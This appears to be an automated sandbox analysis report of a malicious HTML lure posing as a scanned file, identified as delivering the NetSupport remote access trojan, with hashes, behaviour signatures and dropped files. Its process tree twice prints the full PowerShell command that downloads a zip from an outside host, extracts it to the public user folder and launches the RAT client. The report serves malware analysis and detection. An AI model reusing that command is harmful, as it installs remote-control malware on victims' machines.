Overview

overview

10

Static

static

1

Scanned_05...0.html

windows7-x64

1

Scanned_05...0.html

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-05-2024 18:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Scanned_05_28-2024_402430.html

  • Size

    8KB

  • MD5

    784b4c79a9c2a62a393bbe72714f2043

  • SHA1

    aef37309eacd572503df355ef75ad42021fcd253

  • SHA256

    37961d0ca2cdbc6ad9bf89a892d230d5be6273d34accb3dac4251281ea048ed9

  • SHA512

    e269f6f767be7453e7b402de620786b6464be65bbfd3f5a8ae2fc4e8c873526bb3c9414b598245a2aae2966fcd6946b5b2f97db11acfc48c8916c370989a1024

  • SSDEEP

    96:MhvvIFO2B40aPMfiWTMFSCH+PGy9MgC3/mGlby3Pnwp0tUNAkacVjS0uT9ji/Di5:MGZEhLqMgEOG4/nw+CWvYAZi/Di5

Score
10/10
netsupportexecutionrat

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Scanned_05_28-2024_402430.html
    1⤵
      PID:3372
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=3972 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:1
      1⤵
        PID:3456
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5764 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:1
        1⤵
          PID:5016
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5944 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:4632
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5484 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:1
            1⤵
              PID:4640
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=4796 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:8
              1⤵
                PID:3512
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start /min powershell $st='c:\\users\\public';$om=$st+'\\start.zip';$ps=$st+'\\client\\client32.exe';invoke-webrequest -uri https://cdn3535.shop/1.zip -outfile $om;expand-archive $om $st; start-process $ps;Set-Clipboard -Value ' ';exit;
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:4980
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell $st='c:\\users\\public';$om=$st+'\\start.zip';$ps=$st+'\\client\\client32.exe';invoke-webrequest -uri https://cdn3535.shop/1.zip -outfile $om;expand-archive $om $st; start-process $ps;Set-Clipboard -Value ' ';exit;
                  2⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1388
                  • C:\users\public\client\client32.exe
                    "C:\users\public\client\client32.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:4532

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j3iv040a.enl.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Public\client\HTCTL32.DLL
                Filesize

                320KB

                MD5

                2d3b207c8a48148296156e5725426c7f

                SHA1

                ad464eb7cf5c19c8a443ab5b590440b32dbc618f

                SHA256

                edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

                SHA512

                55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

                Download Submit

              • C:\Users\Public\client\PCICHEK.DLL
                Filesize

                18KB

                MD5

                a0b9388c5f18e27266a31f8c5765b263

                SHA1

                906f7e94f841d464d4da144f7c858fa2160e36db

                SHA256

                313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

                SHA512

                6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

                Download Submit

              • C:\Users\Public\client\client32.exe
                Filesize

                54KB

                MD5

                9497aece91e1ccc495ca26ae284600b9

                SHA1

                a005d8ce0c1ea8901c1b4ea86c40f4925bd2c6da

                SHA256

                1b63f83f06dbd9125a6983a36e0dbd64026bb4f535e97c5df67c1563d91eff89

                SHA512

                4c892e5029a707bcf73b85ac110d8078cb273632b68637e9b296a7474ab0202320ff24cf6206de04af08abf087654b0d80cbecfae824c06616c47ce93f0929c9

                Download Submit

              • C:\users\public\client\MSVCR100.dll
                Filesize

                755KB

                MD5

                0e37fbfa79d349d672456923ec5fbbe3

                SHA1

                4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

                SHA256

                8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

                SHA512

                2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

                Download Submit

              • C:\users\public\client\NSM.LIC
                Filesize

                257B

                MD5

                6fd57fbafce2705f6dbe31df8e9c63cb

                SHA1

                9dbdd6322a37609780d5370a59efbef7d74d4b0d

                SHA256

                d7ec9f8b88ae02b6075db789ac8ac7cbb359fe54bb1a2af1669ea1c8a15fc91e

                SHA512

                ff96b534dac567450bd3670a4f3feaf0af94334af53ec06b66386489bce842fb4f8c41963d28b066d1624d790add8ead7e4871c3cf55d27ab943a74458cdb4cf

                Download Submit

              • C:\users\public\client\PCICL32.dll
                Filesize

                3.5MB

                MD5

                ad51946b1659ed61b76ff4e599e36683

                SHA1

                dfe2439424886e8acf9fa3ffde6caaf7bfdd583e

                SHA256

                07a191254362664b3993479a277199f7ea5ee723b6c25803914eedb50250acf4

                SHA512

                6c30e7793f69508f6d9aa6edcec6930ba361628ef597e32c218e15d80586f5a86d89fcbee63a35eab7b1e0ae26277512f4c1a03df7912f9b7ff9a9a858cf3962

                Download Submit

              • C:\users\public\client\client32.ini
                Filesize

                646B

                MD5

                1181c5070b3d5dbd82e3167e0eee7d13

                SHA1

                91aaf3e633d11d4dbb82e53a8fe6f7f461ff2ea6

                SHA256

                608e848e65d4298688ac18a939f7ac1848332ef7c39ec4e135091a2ebeb1a524

                SHA512

                1b0dbd30252bf924aa82777e380c2e82309ff8be6120b05916f7bb72d5270542c3bc2cee965c7c8c58196651e261788b2e29377cb5764e42d65de92015411780

                Download Submit

              • C:\users\public\client\pcicapi.dll
                Filesize

                32KB

                MD5

                dcde2248d19c778a41aa165866dd52d0

                SHA1

                7ec84be84fe23f0b0093b647538737e1f19ebb03

                SHA256

                9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

                SHA512

                c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

                Download Submit

              • memory/1388-15-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1388-21-0x000001F655A80000-0x000001F655A92000-memory.dmp

                Filesize

                72KB

                Download

              • memory/1388-22-0x000001F63B980000-0x000001F63B98A000-memory.dmp

                Filesize

                40KB

                Download

              • memory/1388-19-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1388-18-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1388-17-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1388-16-0x00007FFC8A143000-0x00007FFC8A145000-memory.dmp

                Filesize

                8KB

                Download

              • memory/1388-2-0x00007FFC8A143000-0x00007FFC8A145000-memory.dmp

                Filesize

                8KB

                Download

              • memory/1388-14-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1388-13-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1388-12-0x000001F63B9A0000-0x000001F63B9C2000-memory.dmp

                Filesize

                136KB

                Download

              • memory/1388-76-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

                Download